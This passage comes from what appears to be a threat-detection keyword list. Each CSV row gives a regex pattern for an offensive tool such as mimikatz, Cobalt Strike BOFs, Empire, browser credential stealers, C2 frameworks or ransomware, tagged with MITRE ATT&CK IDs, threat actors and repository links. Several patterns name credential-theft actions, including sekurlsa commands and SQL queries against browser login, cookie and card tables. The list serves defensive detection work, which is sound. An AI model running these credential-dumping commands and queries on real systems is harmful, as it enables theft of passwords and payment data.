hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58356" "*sekurlsa::ssp*",".{0,1000}sekurlsa\:\:ssp.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58357" "*sekurlsa::tickets*",".{0,1000}sekurlsa\:\:tickets.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58358" "*sekurlsa::trust*",".{0,1000}sekurlsa\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58359" "*sekurlsa::tspkg*",".{0,1000}sekurlsa\:\:tspkg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58360" "*sekurlsa::wdigest*",".{0,1000}sekurlsa\:\:wdigest.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58361" "*SELECT * FROM EvilSignature*",".{0,1000}SELECT\s.{0,1000}\sFROM\sEvilSignature.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","58362" "*SELECT * FROM EvilSignature*",".{0,1000}SELECT\s.{0,1000}\sFROM\sEvilSignature.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","58363" "*SELECT * from smbsr WHERE *",".{0,1000}SELECT\s.{0,1000}\sfrom\ssmbsr\sWHERE\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","58364" "*SELECT * FROM Win32_GroupUser WHERE GroupComponent=Win32_Group.Domain=VARIABLE,Name='Administrators'*",".{0,1000}SELECT\s.{0,1000}\sFROM\sWin32_GroupUser\sWHERE\sGroupComponent\=Win32_Group\.Domain\=VARIABLE,Name\=\'Administrators\'.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","58365" "*SELECT action_url, username_value, password_value FROM logins'*",".{0,1000}SELECT\saction_url,\susername_value,\spassword_value\sFROM\slogins\'.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","58366" "*SELECT displayName FROM 
AntiVirusProduct*",".{0,1000}SELECT\sdisplayName\sFROM\sAntiVirusProduct.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","58367" "*SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies*",".{0,1000}SELECT\shost_key,\sname,\spath,\sencrypted_value,\sexpires_utc\sFROM\scookies.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","58368" "*SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies*",".{0,1000}SELECT\shost_key,\sname,\spath,\sencrypted_value,\sexpires_utc\sFROM\scookies.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","58369" "*SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards*",".{0,1000}SELECT\sname_on_card,\sexpiration_month,\sexpiration_year,\scard_number_encrypted\sFROM\scredit_cards.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - 
TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","58370" "*SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards*",".{0,1000}SELECT\sname_on_card,\sexpiration_month,\sexpiration_year,\scard_number_encrypted\sFROM\scredit_cards.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","58371" "*SELECT origin_url, username_value, password_value FROM logins*",".{0,1000}SELECT\sorigin_url,\susername_value,\spassword_value\sFROM\slogins.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","58372" "*SELECT origin_url, username_value, password_value FROM logins*",".{0,1000}SELECT\sorigin_url,\susername_value,\spassword_value\sFROM\slogins.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","58373" "*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*",".{0,1000}SELECT\sSYSTEM_USER\sas\s\'Logged\sin\sas\'.{0,1000}\sCURRENT_USER\sas\s\'Mapped\sas\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","58374" "*SELECT user_name, password FROM 
VeeamBackup.dbo.Credentials*",".{0,1000}SELECT\suser_name,\spassword\sFROM\sVeeamBackup\.dbo\.Credentials.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","58375" "*SELECT WindowTitle, TimeStamp, ImageToken *FROM WindowCapture*",".{0,1000}SELECT\sWindowTitle,\sTimeStamp,\sImageToken\s.{0,1000}FROM\sWindowCapture.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","58376" "*Select-String -Path .\nmap_smb.gnmap -Pattern *open*| foreach { echo $_.tostring().split()[1] } > *",".{0,1000}Select\-String\s\-Path\s\.\\nmap_smb\.gnmap\s\-Pattern\s.{0,1000}open.{0,1000}\|\sforeach\s\{\secho\s\$_\.tostring\(\)\.split\(\)\[1\]\s\}\s\>\s.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58377" "*self.keylogger_widget*",".{0,1000}self\.keylogger_widget.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","58378" "*self.sprayer.auth_O365*",".{0,1000}self\.sprayer\.auth_O365.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","58379" "*self_delete.x64.o*",".{0,1000}self_delete\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - 
RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","N/A","10","10","180","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z","58380" "*Self_Deletion_BOF*",".{0,1000}Self_Deletion_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","N/A","10","10","180","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z","58381" "*-selfdelete.exe -d:selfdelete*",".{0,1000}\-selfdelete\.exe\s\-d\:selfdelete.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","58382" "*SeManageVolumeExploit.*",".{0,1000}SeManageVolumeExploit\..{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","N/A","10","2","110","17","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z","58383" "*SeManageVolumeExploit-main",".{0,1000}SeManageVolumeExploit\-main","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","N/A","10","2","110","17","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z","58384" "*Semperis/GoldenGMSA*",".{0,1000}Semperis\/GoldenGMSA.{0,1000}","offensive_tool_keyword","GoldenGMSA","GoldenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","58385" "*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* 
\]*",".{0,1000}send\s\\.{0,1000}\\\[\s\\\\.{0,1000}\\\$BASH\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\-o\s\\\\.{0,1000}\\\$SHELL\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\\\].{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","58386" "*Send a file via DoH.*",".{0,1000}Send\sa\sfile\svia\sDoH\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","58387" "*send badger response to ratel server and recv the next command*",".{0,1000}send\sbadger\sresponse\sto\sratel\sserver\sand\srecv\sthe\snext\scommand.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","58388" "*Send me some bitcoins or 
kebab*",".{0,1000}Send\sme\ssome\sbitcoins\sor\skebab.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variants in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","58389" "*Send the payload with the grooms*",".{0,1000}Send\sthe\spayload\swith\sthe\sgrooms.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - 
PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58390" "*send_invoke_shellcode(*ratID*",".{0,1000}send_invoke_shellcode\(.{0,1000}ratID.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58391" "*send_ps1_payload*",".{0,1000}send_ps1_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 